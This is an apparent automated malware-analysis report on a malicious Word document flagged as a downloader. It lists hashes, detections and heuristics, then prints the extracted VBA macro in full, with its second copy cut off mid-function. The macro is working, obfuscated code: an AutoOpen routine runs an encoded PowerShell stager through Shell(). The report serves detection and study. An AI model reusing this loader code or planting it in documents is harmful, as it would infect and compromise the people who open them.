Office (OLE) malware analysis — malicious · 4c0d4c7082bbabf8

MALICIOUS

Office (OLE)

99.2 KB Created: 2018-06-11 10:54:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 528c1e350d58b4137c5752aa6a86378e SHA-1: 62d0f01e7893673c0fc7d73a23c2b118708ec7e9 SHA-256: 4c0d4c7082bbabf882d39b24b073efeb97f1bdb362d842d812110251afce9bfe

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Valyria-6595163-0. Critical heuristics indicate the presence of a Shell() call within VBA macros, and a specific auto-execution marker (Autoopen). The VBA script attempts to construct and execute a command using the Shell() function, which is a common technique for downloading and executing further malicious content. The exact command constructed is obfuscated but appears to be related to PowerShell execution.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

cizzz = GdEtdB
iSrdFmN = rPMIhAAQI + Shell(UfiXujVCVjo + Chr(GblXXvqvoj + vbKeyP + wnbDAs) + "owers" + Lkjzp + ObKcIzh + lqamIFIjzZ + afhrdvF + YjbEZkY, 56639 - 56639)
ivGPcv = CLng(88108 * CSng(kLHILK + ChrB(JzvDj + CInt(38708))))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10378 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10378 bytes
SHA-256: `243bca5e94a34c5a12dba9c0c4ee0f5b069c45ac609255b968e13c26d5e7b186`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HwdfRtu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function iSrdFmN() On Error Resume Next iKAddk = CLng(59584 * CSng(TXRMdt + ChrB(CIaam + CInt(38484)))) YXojN = Int(cifAU) rJoLbq = Azjcsl uWzpXr = Sldoz OzpsQ = lBOOwz vTOouv = TVGjqd WZXKXd = CLng(38560 * CSng(AIrLAz + ChrB(jHBpmw + CInt(3785)))) witCD = Int(tICnPP) qEZVQT = Gzjvv pzfAqj = Wabdb iHzpY = kQpDcT cizzz = GdEtdB iSrdFmN = rPMIhAAQI + Shell(UfiXujVCVjo + Chr(GblXXvqvoj + vbKeyP + wnbDAs) + "owers" + Lkjzp + ObKcIzh + lqamIFIjzZ + afhrdvF + YjbEZkY, 56639 - 56639) ivGPcv = CLng(88108 * CSng(kLHILK + ChrB(JzvDj + CInt(38708)))) lYbcj = Int(niNVn) BpKabh = WsXprn vTEzaV = fJhozO MGzlV = IWzZUW zLOjj = tZUZPv End Function Sub Autoopen() On Error Resume Next wWfdl = CLng(54076 * CSng(BKlZE + ChrB(EiZTf + CInt(56694)))) OfTvw = Int(KVwrh) pCkmqW = sDEmao NkPAAt = rDTCji RzCSDr = TTsiz lAJstH = qZGwr iSrdFmN vwzRjH = CLng(83590 * CSng(aGCTX + ChrB(PuQWSC + CInt(1541)))) qtbJc = Int(qrqEb) vQUCJ = FmKtHY JDwJj = onuHFq fjPiP = sIBzaO rwOqw = CmSHui End Sub Attribute VB_Name = "YmbBIOMj" Function Lkjzp() On Error Resume Next VakwK = CLng(40276 * CSng(MqiAKL + ChrB(sTKmo + CInt(94205)))) qwDsLL = Int(CXabLq) hubbB = thmRs qLVaR = FBfch zJAKS = YzUPK jLmpG = LlzHU XDjWz = "HeLL" + " -e" + " IAAuACgAIAAkA" + "FAAcwBIAE8" + "AbQBFA" + "FsAM" + "gAxA" jzIRF = CLng(78941 * CSng(FMUcsH + ChrB(Pittja + CInt(2159)))) rGXPvW = Int(wHroi) VzHtfo = LOjui shsGY = RkGCup EoQNkE = Eufmz mvkcX = hXijEB EwlZRmsZf = "F0AKwAkAFAAcwBI" + "AG8AbQBFAFsA" + "MwA0AF0AK" + "wAnAFg" + "AJ" + "wA" + "pACgAIABuAGUA" + "VwAtAE8" + "AYgBKAEUAY" + "wBUACAA" uRtOz = CLng(24185 * CSng(ljRvB + ChrB(pJTwBF + CInt(12892)))) HVzdi = Int(IWaEM) RKHLf = ZvSCip YnXDfh = uwmvtl vvOJM = phfCHT jLCEr = BGdkT FRjswbK = "IABJAE8AL" + "gBjAG8ATQ" + "BwAFIARQBz" + "AFMASQBPAG4AL" + "gBEA" + "EUAZgBsAEEAVA" + "BFAHMAdAByAEU" XORSXM = CLng(35014 * CSng(PizDtS + ChrB(mrIVw + CInt(23210)))) RjwiE = Int(kMRLvO) TYPHpp = FCLwK COPVO = iKwhW HiJCNo = fdnOb fHmIP = zXfjV ScCTVbLci = "AQQB" + "tACgAI" + "AB" + "bAFMAW" vzYfiX = CLng(81195 * CSng(SiGQCo + ChrB(qfuPA + CInt(75557)))) iPwCj = Int(YRcCn) Rqjzz = YihzA FbAGr = RVKaOJ cqjUBG = czXjH vzbEnk = bwFJS BqlfuzrYKT = "QBz" + "AFQAZQB" + "NAC4ASQBPA" + "C4Ab" + "QBlAG0AbwBS" + "AHk" rkSvr = CLng(53767 * CSng(QWZsO + ChrB(rvsIDT + CInt(97138)))) pStFn = Int(uHjkWB) PUKBjE = PYZjpH TioCpT = BRZpD fJqpVM = cbiGX QwQtJ = jlaYr FWqZWnDYajI = "AUwBU" + "AHIAZQBhAE0AX" + "QAgAFs" + "Acw" + "BZAHMAVABFAE0" + "ALgBjAG8ATgBWA" + "GUAcgBUAF0AOgA6" + "AGYAUgBvAE0AY" hhNNCk = CLng(22755 * CSng(GCFikO + ChrB(CQrAhi + CInt(50154)))) RlYPa = Int(MEkwG) iqPZzu = IOriJu dVjYKE = iwbdV EuzVjd = wLARCm RpaDPV = uqVLoC QOCqVrR = "gB" + "hAHMARQA2ADQA" + "UwBUAFIASQB" + "uAGcAKAAg" + "AC" + "cAVg" + "BaAEQ" AunwcJ = CLng(82565 * CSng(QVwfT + ChrB(RUSVYV + CInt(80065)))) VYNAzK = Int(cJvau) QNUacr = YEEjB cWCqPh = LZPicL JoMDFZ = BHzvvd QRUizw = hZTftD QjMJnT = "AdABTAH" + "cASgBCAEUATQBi" + "AC8AbABm" + "ADEAdwBjAE" + "UA" + "cQA1AFYAeQ" rzlwRL = CLng(89332 * CSng(rAibIb + ChrB(FuUDF + CInt(89117)))) vEdNw = Int(PtXLWE) JLwdS = hZTzXp RTYLp = sjChVE RUwdS = ERGuw lONibF = XsKvV UQFUCMj = "BBAEcASABrAEcAb" + "AB2AF" + "IAR" + "wBKAGMAW" + "QB" + "rAEY" + "AUQBlAHoAdABq" + "AGQANwBxAHYAbA" + "B5ADcAb" + "wAzAHMAcQAvAHU" Lkjzp = XDjWz + EwlZRmsZf + FRjswbK + ScCTVbLci + BqlfuzrYKT + FWqZWnDYajI + QOCqVrR + QjMJnT + UQFUCMj End Function Function ObKcIzh() On Error Resume Next WYLZG = CLng(58237 * CSng(ZGZMbq + ChrB(SkoLZZ + CInt(40864)))) jiBab = Int(jTGYc) wjssz = XQfpA lYmnD = WvrSoj fCLtm = owZkl wMJCEY = ivpDcs OuhpjjIp = "AKwB" + "0AFoAb" + "ABKAGYAQgBtAGE" + "AZQAzAHoAR" + "ABQAFAASg" HChZi = CLng(85154 * CSng(UTNMW + ChrB(XLHLnB + CInt(91794)))) nMsmu = Int(CcqwiB) KmRzG = fcswqi XSndPb = JUponk JrcOdV = MZqLh QiuQC = PWjpM HhQGdALtzi = "BGADQA" + "dwBMA" + "FUAagBsADAAU" + "wBEAGIANQB" + "sADgAQgBoAH" + "kA" + "SgBa" GENqwd = CLng(23347 * CSng(vVkPh + ChrB(MHLtz + CInt(34512)))) ThiZZl = Int(UbaCQf) RJWcM = KMutii qHLpru = mXiQX cBTviz = pvzoQ SXGmlv = vsNQkK ofiIj = "AGIAbwB3AEsAbwA" + "xAG" + "0AdgBUAHYAR" + "gAvADA" + "AdgBaAHkAaQBFA" + "G8A" + "TwBnAEMAawB" + "ZADgAaAA3" + "AFUA" fkubF = CLng(10293 * CSng(XJtwK + ChrB(hAvJWZ + CInt(13553)))) cjkwUh = Int(joDKXd) EAWjL = uONoa JuzDt = DtCEK kXYoVq = nBKwun OrhOSv = EYBlk LWdVmaYl = "bwBEAEcAT" + "gBIAHAANgBx" + "AFAAcABxA" + "EUAcw" + "BpADQAUgBL" + "AHkA" + "NgBTAGUASwA" + "5AHAAMgBJAGw" zTjUA = CLng(81331 * CSng(wnqGtX + ChrB(nOwwC + CInt(31734)))) zMLnl = Int(IjzXC) jpTRpv = vpaAb vvipZ = jTDBH jPbiR = SDIrLU JDzUQW = kSpSZ ZdUdM = "AcABKAGgATAB" + "zAEU" + "AeQBDAEUAcABRA" + "GIAbABkAHoA" + "agAyADEATAB5ADU" + "ATwBvAFA" + "AaAB" + "TAF" + "gAdwBWAFE" + "ANgBXAEcAMQ" ZUSRcn = CLng(22181 * CSng(JjcNXn + ChrB(XMEkOs + CInt(31266)))) mzmfwn = Int(ZIJaN) lqOXID = WUHtj MFliKw = VjSpH FvGUD = ZjmVqM pQdRr = wSaHna PQIzZXiBA = "AwA" + "EwAbwAvAGY" + "AWQBjAFAAUQA" + "xAEcAcwBFAFIAdQ" cEdEYY = CLng(31190 * CSng(zEPADw + ChrB(takvV + CInt(9761)))) tsPaw = Int(wfnSt) TUGhz = wMrLN owmYA = sFtTK pwbFwS = wHwdo tndYsR = iwmAYX vLIvK = "A1AFcAQ" + "wB1AFQARQ" + "A0AEIAMwBJAHY" + "ATAB4" ObKcIzh = OuhpjjIp + HhQGdALtzi + ofiIj + LWdVmaYl + ZdUdM + PQIzZXiBA + vLIvK End Function Function lqamIFIjzZ() On Error Resume Next QanMAK = CLng(41337 * CSng(wprPZv + ChrB(JpTzl + CInt(12509)))) OhACcG = Int(MbjYnA) TldiR = onjcs Oowjam = fLGLz PAmOKq = utqEqS EvbAX = qrCQu PwSNC = "AGUAZAArAGwANQB" + "sAFIAMQAwAFoA" + "NQAzAEoAZwB2" + "AEYAUQ" mOULM = CLng(50781 * CSng(zCBCZV + ChrB(GrVwsq + CInt(14922)))) TkkFn = Int(qXzVTE) Waidd = VRDtB mDwWEX = wUvka msGiD = FRhjRm OfmBQ = ibBjsB IYYjtQKNVYS = "BMAEoAegBnA" + "HQASQ" + "BIAGwAYgAzAE4A" + "dwBNAE8AdgBa" + "AEkATQBHAEU" + "AVgBxADIAdA" + "BxAFgAZ" zQGkbq = CLng(14647 * CSng(qSOmz + ChrB(wNEUj + CInt(69013)))) JXLSit = Int(flINdK) pKzHbf = XNXORi NzOLRJ = suRzwP FKAIod = DHNFE lKoENP = RotCM GdHCpqZEh = "QBJAGYA" + "aQAvAGMAawBwAGw" + "Aaw" + "BsAEIAVAB" + "iAGkAcQA3AGkAWg" + "BSAG4ANAArAHoA" + "SAB3AHcA" uwPfJ = CLng(58432 * CSng(HSCWF + ChrB(AiKpBF + CInt(23892)))) ChGNk = Int(IYRQww) jKnbDb = dTHRwk bHwsw = crPJSZ GjAmXJ = RUXOwi vjZoP = ShRSXC qzsusliniBN = "SAA" + "rADIAagB" + "vA" + "EIAcABxAGI" + "ASgB5AGY" + "AawB" + "vAHYAM" + "gBXAGIAd" + "gBUAEQAbg" + "ByAC8AZQB1ADEA" KrvdId = CLng(58554 * CSng(tSVtow + ChrB(HjktRc + CInt(64338)))) pUDai = Int(RiOVM) ZYtFUA = BREuaD Zhiil = djFJF AIckG = cSYjq ZRnjql = cXJzk ZjEujrolrp = "NgBzAHg" + "AMABBAGUA" + "dABrAE" + "4ANwAxAGYAawBoA" + "E0AUQBm" + "AGMAYQ" + "BpAE" kksApT = CLng(70134 * CSng(RzfZj + ChrB(Wwkzqr + CInt(8578)))) TjztT = Int(cfqJrl) ojSiP = iHRHG oDimM = sufQM wzBXl = Whvah ROala = CYqjff NYDratzaM = "gAMwBkAEIAUwBx" + "AE" + "MARgBPA" + "EoAOABiA" lqamIFIjzZ = PwSNC + IYYjtQKNVYS + GdHCpqZEh + qzsusliniBN + ZjEujrolrp + NYDratzaM End Function Function afhrdvF() On Error Resume Next tizzqq = CLng(46071 * CSng(PmQEG + ChrB(IlZON + CInt(42818)))) VziGU = Int(OoLMTW) siWiF = JsCcJh atnRV = IiXhR VHJiDZ = ihdiOq cMXTU = ZBIUB RpAmNvHFFDp = "HUAagBEAFMA" + "aQAwAFcAQgBa" + "AEQA" + "RgArAEkAMABPA" + "FEAUQBUAG" + "4ATwBEAGQAcg" + "BYAD" + "UAaQBaAFQAM" rBNqUw = CLng(10238 * CSng(jcAJwD + ChrB(zlwPY + CInt(52099)))) pwLEM = Int(SUzohK) wVrJhJ = ZAMNU MaPLF = SfMQiP MXOdLc = WQduni amojw = vjrEnj PiJmiOR = "gBqAGQAZgBTAHMA" + "TwB" + "KAE8AUwBQAGgA" + "bAA" + "2AGEAdgBKADAAQ" + "QBvADkA" + "YgBUAF" + "IAUA" + "B5AGUA" + "RgBtAE" rCkEM = CLng(88291 * CSng(wcKWBk + ChrB(vwwVYX + CInt(25631)))) sXjjfo = Int(fKpcYw) jZitk = zcSiN AjvjP = rwJMX OIPzAh = MjaQW fmuuQF = Scnzkb PCzKpmaZJ = "0AOAAyAFE" + "AVwBXAHcATgByAG" + "UASA" + "BoAC8AOQA5A" + "Hg" PjwKT = CLng(4557 * CSng(ibDAc + ChrB(JBTZTY + CInt(92002)))) ZwDtHZ = Int(lVSMY) JflQz = lALru UoQJOi = fpqku LdotG = nDdAVh VDKkO = JFnlw DFNwqUHRk = "AbQBvA" + "GMA" + "cgA4ADM" + "AVABMAE" + "cAZgBKAHkANAA2A" + "DEAQQBhAEo" + "AWABHAEkAWQBrA" + "CsANgBXADM" GoAtSS = CLng(91228 * CSng(zmrwGE + ChrB(Gkrnu + CInt(54082)))) IIUFb = Int(kLXrrR) wnJKh = pKjMNd zDUvz = ABjrY qQGnO = EpEKSb FUmvYw = cRfhr OQvcwbhF = "ATgBvAGMASgBkA" + "GsAcwA5A" + "GgAZwAwADAAaAAz" + "AFcANgAv" + "AEEAUQA9AD0A" + "JwAgACkAIAAsA" + "FsASQBPAC4AYw" + "BvAE0AcABSAGUA" + "cwBTAEkA" tqQwQw = CLng(70421 * CSng(qJjWVM + ChrB(nFoks + CInt(29789)))) hNGHvS = Int(ZlZvmF) YFuWq = OKCYDk oMqwwM = ICsJB NRXJb = GuOzuN hiWLh = KUwNv LvzPSdQj = "bwBu" + "AC4AYwBvAE0A" + "UABSAGUAUw" + "BzAEkAbwBOAE" + "0ATwBEAGUA" + "XQA6ADoA" + "ZABFAGM" afhrdvF = RpAmNvHFFDp + PiJmiOR + PCzKpmaZJ + DFNwqUHRk + OQvcwbhF + LvzPSdQj End Function Function YjbEZkY() On Error Resume Next waEFVN = CLng(71388 * CSng(YUwns + ChrB(VdDaMv + CInt(67450)))) fXmrLF = Int(zREchi) CosmJ = dMhjSk hRVAzt = vjTdCf aCrKLS = aOhZm TSpDZa = IjvDd cWcvZrzchDr = "ATwBNAFAAU" + "gBl" + "AHM" + "AUwApACAAfAAgA" fNVVOk = CLng(57648 * CSng(DJpZG + ChrB(VGCob + CInt(24494)))) jcrPE = Int(IWtHnj) mzFtT = IdQIAi HBBdH = RlwkiF JVqJC = skfWB VmEYQ = rllTG BCtFooUCO = "CUAIAB7AC" + "AAbgBlAF" + "cALQBPA" + "GIASgB" + "FA" PzLPk = CLng(76696 * CSng(bnIfm + ChrB(GFwlib + CInt(60042)))) UmpMN = Int(PmTZpO) tCqdz = HaWMHR JOtACs = UvNVCX zoTjq = SNCHH kYawZi = bZAtTX qCMClAdbuo = "GMAVAAgACAAS" + "QBPAC4AcwBUAFI" + "AZQBhAG0Acg" + "BFAE" + "EAZABFA" + "FIAK" + "AA" + "gAC" + "QAXwAgAC" + "wAIABbAHQAZQBY" nAzpUa = CLng(53338 * CSng(HmCdRt + ChrB(wMlsS + CInt(15162)))) uzonH = Int(fwuAMt) RPNnjH = QowwQB coIaE = jGABjT GIrBQY = CjwzL KnFBr = FoCKl bfnCNhZuWX = "AHQALgBlAE" + "4AQwBvAGQAaQBO" + "AEcAXQA6ADoAYQB" + "zAEMASQBJA" + "CAAKQB" + "9ACkALgBS" IDBKP = CLng(23696 * CSng(NcqHw + ChrB(fstFvp + CInt(20760)))) tiwAw = Int(KNqDw) cIUHs = mrwiU JHMdMj = UaKPZ JQCwz = mIpSWY NiDTQK = Qrrzj QIZZIiOjAu = "AGUAYQBk" + "AFQ" + "AbwBlAG4ARAAo" + "ACAAKQA=" YjbEZkY = cWcvZrzchDr + BCtFooUCO + qCMClAdbuo + bfnCNhZuWX + QIZZIiOjAu End Function

SHA-256: 243bca5e94a34c5a12dba9c0c4ee0f5b069c45ac609255b968e13c26d5e7b186

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HwdfRtu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iSrdFmN()
On Error Resume Next
iKAddk = CLng(59584 * CSng(TXRMdt + ChrB(CIaam + CInt(38484))))
YXojN = Int(cifAU)
rJoLbq = Azjcsl
uWzpXr = Sldoz
OzpsQ = lBOOwz
vTOouv = TVGjqd
WZXKXd = CLng(38560 * CSng(AIrLAz + ChrB(jHBpmw + CInt(3785))))
witCD = Int(tICnPP)
qEZVQT = Gzjvv
pzfAqj = Wabdb
iHzpY = kQpDcT
cizzz = GdEtdB
iSrdFmN = rPMIhAAQI + Shell(UfiXujVCVjo + Chr(GblXXvqvoj + vbKeyP + wnbDAs) + "owers" + Lkjzp + ObKcIzh + lqamIFIjzZ + afhrdvF + YjbEZkY, 56639 - 56639)
ivGPcv = CLng(88108 * CSng(kLHILK + ChrB(JzvDj + CInt(38708))))
lYbcj = Int(niNVn)
BpKabh = WsXprn
vTEzaV = fJhozO
MGzlV = IWzZUW
zLOjj = tZUZPv
End Function
Sub Autoopen()
On Error Resume Next
wWfdl = CLng(54076 * CSng(BKlZE + ChrB(EiZTf + CInt(56694))))
OfTvw = Int(KVwrh)
pCkmqW = sDEmao
NkPAAt = rDTCji
RzCSDr = TTsiz
lAJstH = qZGwr
iSrdFmN
vwzRjH = CLng(83590 * CSng(aGCTX + ChrB(PuQWSC + CInt(1541))))
qtbJc = Int(qrqEb)
vQUCJ = FmKtHY
JDwJj = onuHFq
fjPiP = sIBzaO
rwOqw = CmSHui
End Sub


Attribute VB_Name = "YmbBIOMj"
Function Lkjzp()
On Error Resume Next
VakwK = CLng(40276 * CSng(MqiAKL + ChrB(sTKmo + CInt(94205))))
qwDsLL = Int(CXabLq)
hubbB = thmRs
qLVaR = FBfch
zJAKS = YzUPK
jLmpG = LlzHU
XDjWz = "HeLL" + " -e" + " IAAuACgAIAAkA" + "FAAcwBIAE8" + "AbQBFA" + "FsAM" + "gAxA"
jzIRF = CLng(78941 * CSng(FMUcsH + ChrB(Pittja + CInt(2159))))
rGXPvW = Int(wHroi)
VzHtfo = LOjui
shsGY = RkGCup
EoQNkE = Eufmz
mvkcX = hXijEB
EwlZRmsZf = "F0AKwAkAFAAcwBI" + "AG8AbQBFAFsA" + "MwA0AF0AK" + "wAnAFg" + "AJ" + "wA" + "pACgAIABuAGUA" + "VwAtAE8" + "AYgBKAEUAY" + "wBUACAA"
uRtOz = CLng(24185 * CSng(ljRvB + ChrB(pJTwBF + CInt(12892))))
HVzdi = Int(IWaEM)
RKHLf = ZvSCip
YnXDfh = uwmvtl
vvOJM = phfCHT
jLCEr = BGdkT
FRjswbK = "IABJAE8AL" + "gBjAG8ATQ" + "BwAFIARQBz" + "AFMASQBPAG4AL" + "gBEA" + "EUAZgBsAEEAVA" + "BFAHMAdAByAEU"
XORSXM = CLng(35014 * CSng(PizDtS + ChrB(mrIVw + CInt(23210))))
RjwiE = Int(kMRLvO)
TYPHpp = FCLwK
COPVO = iKwhW
HiJCNo = fdnOb
fHmIP = zXfjV
ScCTVbLci = "AQQB" + "tACgAI" + "AB" + "bAFMAW"
vzYfiX = CLng(81195 * CSng(SiGQCo + ChrB(qfuPA + CInt(75557))))
iPwCj = Int(YRcCn)
Rqjzz = YihzA
FbAGr = RVKaOJ
cqjUBG = czXjH
vzbEnk = bwFJS
BqlfuzrYKT = "QBz" + "AFQAZQB" + "NAC4ASQBPA" + "C4Ab" + "QBlAG0AbwBS" + "AHk"
rkSvr = CLng(53767 * CSng(QWZsO + ChrB(rvsIDT + CInt(97138))))
pStFn = Int(uHjkWB)
PUKBjE = PYZjpH
TioCpT = BRZpD
fJqpVM = cbiGX
QwQtJ = jlaYr
FWqZWnDYajI = "AUwBU" + "AHIAZQBhAE0AX" + "QAgAFs" + "Acw" + "BZAHMAVABFAE0" + "ALgBjAG8ATgBWA" + "GUAcgBUAF0AOgA6" + "AGYAUgBvAE0AY"
hhNNCk = CLng(22755 * CSng(GCFikO + ChrB(CQrAhi + CInt(50154))))
RlYPa = Int(MEkwG)
iqPZzu = IOriJu
dVjYKE = iwbdV
EuzVjd = wLARCm
RpaDPV = uqVLoC
QOCqVrR = "gB" + "hAHMARQA2ADQA" + "UwBUAFIASQB" + "uAGcAKAAg" + "AC" + "cAVg" + "BaAEQ"
AunwcJ = CLng(82565 * CSng(QVwfT + ChrB(RUSVYV + CInt(80065))))
VYNAzK = Int(cJvau)
QNUacr = YEEjB
cWCqPh = LZPicL
JoMDFZ = BHzvvd
QRUizw = hZTftD
QjMJnT = "AdABTAH" + "cASgBCAEUATQBi" + "AC8AbABm" + "ADEAdwBjAE" + "UA" + "cQA1AFYAeQ"
rzlwRL = CLng(89332 * CSng(rAibIb + ChrB(FuUDF + CInt(89117))))
vEdNw = Int(PtXLWE)
JLwdS = hZTzXp
RTYLp = sjChVE
RUwdS = ERGuw
lONibF = XsKvV
UQFUCMj = "BBAEcASABrAEcAb" + "AB2AF" + "IAR" + "wBKAGMAW" + "QB" + "rAEY" + "AUQBlAHoAdABq" + "AGQANwBxAHYAbA" + "B5ADcAb" + "wAzAHMAcQAvAHU"
Lkjzp = XDjWz + EwlZRmsZf + FRjswbK + ScCTVbLci + BqlfuzrYKT + FWqZWnDYajI + QOCqVrR + QjMJnT + UQFUCMj
End Function
Function ObKcIzh()
On Error Resume Next
WYLZG = CLng(58237 * CSng(ZGZMbq + ChrB(SkoLZZ + CInt(40864))))
jiBab = Int(jTGYc)
wjssz = XQfpA
lYmnD = WvrSoj
fCLtm = owZkl
wMJCEY = ivpDcs
OuhpjjIp = "AKwB" + "0AFoAb" + "ABKAGYAQgBtAGE" + "AZQAzAHoAR" + "ABQAFAASg"
HChZi = CLng(85154 * CSng(UTNMW + ChrB(XLHLnB + CInt(91794))))
nMsmu = Int(CcqwiB)
KmRzG = fcswqi
XSndPb = JUponk
JrcOdV = MZqLh
QiuQC = PWjpM
HhQGdALtzi = "BGADQA" + "dwBMA" + "FUAagBsADAAU" + "wBEAGIANQB" + "sADgAQgBoAH" + "kA" + "SgBa"
GENqwd = CLng(23347 * CSng(vVkPh + ChrB(MHLtz + CInt(34512))))
ThiZZl = Int(UbaCQf)
RJWcM = KMutii
qHLpru = mXiQX
cBTviz = pvzoQ
SXGmlv = vsNQkK
ofiIj = "AGIAbwB3AEsAbwA" + "xAG" + "0AdgBUAHYAR" + "gAvADA" + "AdgBaAHkAaQBFA" + "G8A" + "TwBnAEMAawB" + "ZADgAaAA3" + "AFUA"
fkubF = CLng(10293 * CSng(XJtwK + ChrB(hAvJWZ + CInt(13553))))
cjkwUh = Int(joDKXd)
EAWjL = uONoa
JuzDt = DtCEK
kXYoVq = nBKwun
OrhOSv = EYBlk
LWdVmaYl = "bwBEAEcAT" + "gBIAHAANgBx" + "AFAAcABxA" + "EUAcw" + "BpADQAUgBL" + "AHkA" + "NgBTAGUASwA" + "5AHAAMgBJAGw"
zTjUA = CLng(81331 * CSng(wnqGtX + ChrB(nOwwC + CInt(31734))))
zMLnl = Int(IjzXC)
jpTRpv = vpaAb
vvipZ = jTDBH
jPbiR = SDIrLU
JDzUQW = kSpSZ
ZdUdM = "AcABKAGgATAB" + "zAEU" + "AeQBDAEUAcABRA" + "GIAbABkAHoA" + "agAyADEATAB5ADU" + "ATwBvAFA" + "AaAB" + "TAF" + "gAdwBWAFE" + "ANgBXAEcAMQ"
ZUSRcn = CLng(22181 * CSng(JjcNXn + ChrB(XMEkOs + CInt(31266))))
mzmfwn = Int(ZIJaN)
lqOXID = WUHtj
MFliKw = VjSpH
FvGUD = ZjmVqM
pQdRr = wSaHna
PQIzZXiBA = "AwA" + "EwAbwAvAGY" + "AWQBjAFAAUQA" + "xAEcAcwBFAFIAdQ"
cEdEYY = CLng(31190 * CSng(zEPADw + ChrB(takvV + CInt(9761))))
tsPaw = Int(wfnSt)
TUGhz = wMrLN
owmYA = sFtTK
pwbFwS = wHwdo
tndYsR = iwmAYX
vLIvK = "A1AFcAQ" + "wB1AFQARQ" + "A0AEIAMwBJAHY" + "ATAB4"
ObKcIzh = OuhpjjIp + HhQGdALtzi + ofiIj + LWdVmaYl + ZdUdM + PQIzZXiBA + vLIvK
End Function
Function lqamIFIjzZ()
On Error Resume Next
QanMAK = CLng(41337 * CSng(wprPZv + ChrB(JpTzl + CInt(12509))))
OhACcG = Int(MbjYnA)
TldiR = onjcs
Oowjam = fLGLz
PAmOKq = utqEqS
EvbAX = qrCQu
PwSNC = "AGUAZAArAGwANQB" + "sAFIAMQAwAFoA" + "NQAzAEoAZwB2" + "AEYAUQ"
mOULM = CLng(50781 * CSng(zCBCZV + ChrB(GrVwsq + CInt(14922))))
TkkFn = Int(qXzVTE)
Waidd = VRDtB
mDwWEX = wUvka
msGiD = FRhjRm
OfmBQ = ibBjsB
IYYjtQKNVYS = "BMAEoAegBnA" + "HQASQ" + "BIAGwAYgAzAE4A" + "dwBNAE8AdgBa" + "AEkATQBHAEU" + "AVgBxADIAdA" + "BxAFgAZ"
zQGkbq = CLng(14647 * CSng(qSOmz + ChrB(wNEUj + CInt(69013))))
JXLSit = Int(flINdK)
pKzHbf = XNXORi
NzOLRJ = suRzwP
FKAIod = DHNFE
lKoENP = RotCM
GdHCpqZEh = "QBJAGYA" + "aQAvAGMAawBwAGw" + "Aaw" + "BsAEIAVAB" + "iAGkAcQA3AGkAWg" + "BSAG4ANAArAHoA" + "SAB3AHcA"
uwPfJ = CLng(58432 * CSng(HSCWF + ChrB(AiKpBF + CInt(23892))))
ChGNk = Int(IYRQww)
jKnbDb = dTHRwk
bHwsw = crPJSZ
GjAmXJ = RUXOwi
vjZoP = ShRSXC
qzsusliniBN = "SAA" + "rADIAagB" + "vA" + "EIAcABxAGI" + "ASgB5AGY" + "AawB" + "vAHYAM" + "gBXAGIAd" + "gBUAEQAbg" + "ByAC8AZQB1ADEA"
KrvdId = CLng(58554 * CSng(tSVtow + ChrB(HjktRc + CInt(64338))))
pUDai = Int(RiOVM)
ZYtFUA = BREuaD
Zhiil = djFJF
AIckG = cSYjq
ZRnjql = cXJzk
ZjEujrolrp = "NgBzAHg" + "AMABBAGUA" + "dABrAE" + "4ANwAxAGYAawBoA" + "E0AUQBm" + "AGMAYQ" + "BpAE"
kksApT = CLng(70134 * CSng(RzfZj + ChrB(Wwkzqr + CInt(8578))))
TjztT = Int(cfqJrl)
ojSiP = iHRHG
oDimM = sufQM
wzBXl = Whvah
ROala = CYqjff
NYDratzaM = "gAMwBkAEIAUwBx" + "AE" + "MARgBPA" + "EoAOABiA"
lqamIFIjzZ = PwSNC + IYYjtQKNVYS + GdHCpqZEh + qzsusliniBN + ZjEujrolrp + NYDratzaM
End Function
Function afhrdvF()
On Error Resume Next
tizzqq = CLng(46071 * CSng(PmQEG + ChrB(IlZON + CInt(42818))))
VziGU = Int(OoLMTW)
siWiF = JsCcJh
atnRV = IiXhR
VHJiDZ = ihdiOq
cMXTU = ZBIUB
RpAmNvHFFDp = "HUAagBEAFMA" + "aQAwAFcAQgBa" + "AEQA" + "RgArAEkAMABPA" + "FEAUQBUAG" + "4ATwBEAGQAcg" + "BYAD" + "UAaQBaAFQAM"
rBNqUw = CLng(10238 * CSng(jcAJwD + ChrB(zlwPY + CInt(52099))))
pwLEM = Int(SUzohK)
wVrJhJ = ZAMNU
MaPLF = SfMQiP
MXOdLc = WQduni
amojw = vjrEnj
